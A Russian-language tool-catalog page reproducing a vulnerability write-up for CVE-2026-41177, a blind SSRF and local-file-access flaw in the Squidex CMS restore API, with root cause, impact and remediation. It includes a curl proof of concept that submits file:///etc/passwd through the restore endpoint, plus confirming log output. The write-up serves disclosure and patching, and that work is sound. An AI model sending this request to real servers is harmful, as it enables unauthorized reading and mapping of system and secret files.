Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41177-Squidex-CMS — CVE-2026-41177, слепая SSRF-уязвимость в Squidex CMS (до версии v7.23.0). Включает анализ первопричины, шаги воспроизведения и оценку воздействия в отношении взаимодействия с локальными файлами (LFI). | Kitploit
Инструменты/GitHubGitHub/turkios/cve-2026-41177-squidex-cms
Анализ уязвимостейЭксплуатацияВеб-безопасностьОбучение и Образование
GitHubturkios/cve-2026-41177-squidex-cms

CVE-2026-41177-Squidex-CMS

CVE-2026-41177, слепая SSRF-уязвимость в Squidex CMS (до версии v7.23.0). Включает анализ первопричины, шаги воспроизведения и оценку воздействия в отношении взаимодействия с локальными файлами (LFI).

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-41177: Слепой SSRF в Squidex CMS

Техническое исследование и анализ CVE-2026-41177: уязвимость слепого межсерверного подделывания запросов (Blind Server-Side Request Forgery, SSRF) в API восстановления Squidex CMS.

Обзор уязвимости

  • Идентификатор CVE: CVE-2026-41177
  • Затронутый компонент: API Squidex: механизм резервного копирования / восстановления (/api/apps/restore)
  • Затронутые версии: < 7.23.0
  • Тип уязвимости: Слепой SSRF (CWE-918), взаимодействие с локальными файлами (CWE-73)

Краткое описание

API восстановления Squidex уязвим к слепому межсерверному подделыванию запросов (Blind SSRF). Приложение не проверяет схему URI в параметре Url, предоставляемом пользователем, что позволяет использовать протокол file://. Это позволяет аутентифицированному администратору заставить серверную часть взаимодействовать с локальной файловой системой, что приводит к взаимодействию с локальными файлами (LFI) и потенциальному раскрытию конфиденциальной информации системы через побочный анализ внутренних журналов.

Подробности

  1. Конфигурация: Злоумышленник создает задание «Восстановление» с использованием URI локальной файловой системы (например, file:///etc/passwd).
  2. Запуск: Злоумышленник отправляет POST-запрос к конечной точке восстановления.
  3. Выполнение: Серверная часть принимает запрос и передает URL фоновому обработчику (RestoreJob).
  4. Наблюдение: Хотя ответ API является стандартным 204 No Content, внутренние журналы сервера показывают, что сервер успешно открыл и прочитал файл, прежде чем завершился с ошибкой, поскольку содержимое не было допустимым ZIP-архивом.

Подтверждение концепции (PoC)

1. Вредоносный запрос

Выполните следующую команду curl (замените <TOKEN> на действительный токен администратора):

root@kitploit:~
curl -X POST http://localhost/api/apps/restore/ \
  -H 'Authorization: Bearer <TOKEN>' \
  -H 'Content-Type: application/json' \
  -d '{
    "Url": "file:///etc/passwd",
    "Name": "exploit-poc"
  }' -v

2. Проверка через журналы

Следующая ошибка в журналах контейнера Squidex подтверждает внутреннее взаимодействие с файлом:

root@kitploit:~
{
  "logLevel": "Error",
  "message": "Backup with job id 381bcfcb-3701-44d0-a8c8-ea43b3ec6271 from URL 'file:///etc/passwd' failed.",
  "exception": {
    "type": "System.IO.InvalidDataException",
    "message": "End of Central Directory record could not be found.",
    "stackTrace": "at System.IO.Compression.ZipArchive.ReadEndOfCentralDirectory()\n at System.IO.Compression.ZipArchive..ctor(Stream stream...)\n at Squidex.Domain.Apps.Entities.Backup.BackupReader..ctor(...) in BackupReader.cs:line 42\n at Squidex.Domain.Apps.Entities.Backup.TempFolderBackupArchiveLocation.OpenReaderAsync(...) in TempFolderBackupArchiveLocation.cs:line 57"
  }
}

Примечание: InvalidDataException подтверждает, что сервер успешно получил доступ к файлу и прочитал его байты.

Влияние

Эта уязвимость позволяет аутентифицированным злоумышленникам:

  • Разведка файловой системы: Подтверждать наличие конфиденциальных файлов (например, appsettings.json, секретов).
  • Раскрытие информации: В средах с несколькими арендаторами это потенциально может быть использовано для доступа к файлам резервных копий других пользователей.

Устранение

  • Обновление: Обновитесь до версии Squidex 7.23.0 или более поздней.
  • Белый список протоколов: Строго разрешайте только схемы http:// и https://.
  • Проверка входных данных: Реализуйте проверку для отклонения любого URI, использующего схему file://, перед обработкой.
  • Безопасная обработка ввода-вывода: Убедитесь, что базовые обработчики ограничены от разрешения локальной файловой системы для вводимых пользователем данных.

Ссылки

  • Рекомендации по безопасности GitHub (GHSA-45fq-w37p-qfw5)
  • Официальная запись CVE
Скачать инструмент